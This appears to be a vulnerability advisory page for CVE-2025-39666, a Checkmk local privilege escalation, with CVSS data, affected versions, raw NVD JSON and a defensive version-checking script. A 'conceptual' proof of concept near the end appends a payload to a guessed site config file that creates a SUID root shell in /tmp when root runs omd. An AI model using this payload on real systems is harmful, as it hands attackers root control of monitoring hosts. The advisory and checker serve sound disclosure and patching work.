Security Vulnerability Report
CVE-2025-39666 CVSS 7.3 HIGH

CVE-2025-39666

Published: 2026-04-07 13:16:45
Last Modified: 2026-04-14 15:39:06

Description

Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root.
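A version check for the affected ranges named above, added here as an example and not part of the advisory or of Checkmk's own tooling. It parses Checkmk version strings (for example 2.3.0p45.cee, where the trailing .cre/.cee/.cce/.cme/.cse is the edition) and compares them with the fixed releases from the description: 2.3.0p46, 2.4.0p25 and 2.5.0b3, with every 2.2.0 build treated as vulnerable because that branch is EOL and has no fix. The release ordering innovation (i) < beta (b) < final < patch (p), the /omd/sites/<site>/version symlink pointing at /omd/versions/<version>, and the SAMPLE_SITES list are assumptions of the example.

```python
import re
from pathlib import Path

# Fixed releases per the advisory text. 2.2.0 is EOL: no fixed build exists.
FIXED_VERSIONS = {
    "2.3.0": "2.3.0p46",
    "2.4.0": "2.4.0p25",
    "2.5.0": "2.5.0b3",
}
EOL_BRANCHES = {"2.2.0"}

# major.minor.patch, optional stage letter + number, optional edition suffix
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:([ibp])(\d+))?(?:\.(c[a-z]{2}))?$")

# Assumed release ordering within one base version:
# innovation (i) < beta (b) < final release < patch (p)
_STAGE_RANK = {"i": 0, "b": 1, "": 2, "p": 3}


def parse_version(version):
    """Turn '2.3.0p45.cee' into ('2.3.0', sortable key).

    The key orders 2.3.0i1 < 2.3.0b1 < 2.3.0 < 2.3.0p1 < 2.3.0p46.
    The edition suffix is ignored for ordering. Raises ValueError for
    strings this parser does not understand (e.g. daily builds).
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Checkmk version string: {version!r}")
    major, minor, patch, stage, num, _edition = m.groups()
    base = f"{major}.{minor}.{patch}"
    key = (int(major), int(minor), int(patch), _STAGE_RANK[stage or ""], int(num or 0))
    return base, key


def assess(version):
    """Classify one version string against the advisory's fixed releases."""
    try:
        base, key = parse_version(version)
    except ValueError:
        return "unrecognised version string"
    if base in EOL_BRANCHES:
        return "vulnerable (EOL, no fix available: migrate to a supported branch)"
    fixed = FIXED_VERSIONS.get(base)
    if fixed is None:
        return "not covered by this advisory"
    _, fixed_key = parse_version(fixed)
    if key < fixed_key:
        return f"vulnerable (fixed in {fixed})"
    return "patched"


def assess_sites(sites):
    """sites: iterable of (site_name, version_string) -> {site_name: status}."""
    return {name: assess(ver) for name, ver in sites}


def discover_sites(omd_root="/omd/sites"):
    """Best-effort discovery on a host with the assumed OMD layout: each site
    has a 'version' symlink into /omd/versions/<version>. Returns [] elsewhere."""
    root = Path(omd_root)
    if not root.is_dir():
        return []
    found = []
    for site_dir in sorted(root.iterdir()):
        link = site_dir / "version"
        if link.is_symlink():
            found.append((site_dir.name, link.resolve().name))
    return found


# Constructed sample inventory, used when no /omd/sites directory exists.
SAMPLE_SITES = [
    ("prod", "2.3.0p45.cee"),
    ("staging", "2.4.0p25.cre"),
    ("lab", "2.5.0b2.cee"),
    ("legacy", "2.2.0p38.cre"),
    ("dev", "2.4.0"),
    ("nightly", "2.4.0-2025.10.01"),
]

if __name__ == "__main__":
    sites = discover_sites() or SAMPLE_SITES
    for site, status in assess_sites(sites).items():
        print(f"{site:10} {status}")
```

Run it as any local user on the monitoring host; it only reads symlinks. Patched sites are those at or above the fixed release on their branch, so 2.5.0 (the final release after b3) counts as patched while a bare 2.4.0 (before p25) does not.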

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

The score above is the primary CVSS 3.1 assessment in the NVD record; its PR:L/UI:R reflects that the attacker is an unprivileged site user and that an administrator has to run `omd` as root for the escalation to trigger. The same record carries a secondary CVSS 4.0 assessment of 9.3 CRITICAL (CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H), so treat the vulnerability as critical on any host with untrusted site users. Weaknesses listed: CWE-426 (Untrusted Search Path) and CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:* - VULNERABLE
Checkmk 2.2.0 (EOL)
Checkmk 2.3.0 < p46
Checkmk 2.4.0 < p25
Checkmk 2.5.0 (beta) < b3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-39666 (Conceptual)
# This script demonstrates how a low-privileged site user might exploit the
# file manipulation vulnerability. The target path is hypothetical: the
# advisory does not name the files that `omd` processes.
import os

# Path to the file processed by 'omd' (hypothetical path based on Checkmk structure)
TARGET_FILE = "/omd/sites/mysite/var/check_mk/conf.d/config.mk"


def exploit():
    print("[*] CVE-2025-39666 PoC - Checkmk Local Privilege Escalation")
    print("[*] Attempting to manipulate site files...")

    # Check if we have write permissions to the target
    if not os.access(TARGET_FILE, os.W_OK):
        print("[-] Write access denied. Exploit failed.")
        return

    # Inject a command to be executed when root runs 'omd', for example one
    # that creates a SUID copy of /bin/sh
    payload = "import os; os.system('cp /bin/sh /tmp/rootshell && chmod 4755 /tmp/rootshell')"
    try:
        with open(TARGET_FILE, "a") as f:
            f.write("\n# Malicious config\n")
            f.write(payload + "\n")
        print(f"[+] Payload injected into {TARGET_FILE}")
        print("[*] Waiting for root user to execute 'omd' commands (e.g., omd restart)...")
        print("[*] Once executed, check /tmp/rootshell for root access.")
    except OSError as e:
        print(f"[-] Error writing payload: {e}")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39666", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:44.847", "lastModified": "2026-04-14T15:39:05.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "matchCriteriaId": "B068974F-6F67-4CBB-B567-FCED86E28F22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "matchCriteriaId": "EA70F36A-EEF6-48DC-B15E-055D0DE8A052"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "matchCriteriaId": "B2017F38-38DB-4E96-B34F-160BC731CBBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "matchCriteriaId": "0949F399-371B-409C-AF9F-32690D881440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "matchCriteriaId": "42E1E31A-B5CC-45F2-A2E5-3EEF735499BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "matchCriteriaId": "4B364FCA-500C-458E-B997-82CD0B1D24F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "matchCriteriaId": "0B32E657-917B-482B-B6A4-3D3746992A4F"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "matchCriteriaId": "2119C732-E024-4DA6-8E47-9E08E5E12602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "matchCriteriaId": "4F0B99A8-A124-43BD-B8AA-EECC9112346F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vu ... (truncated)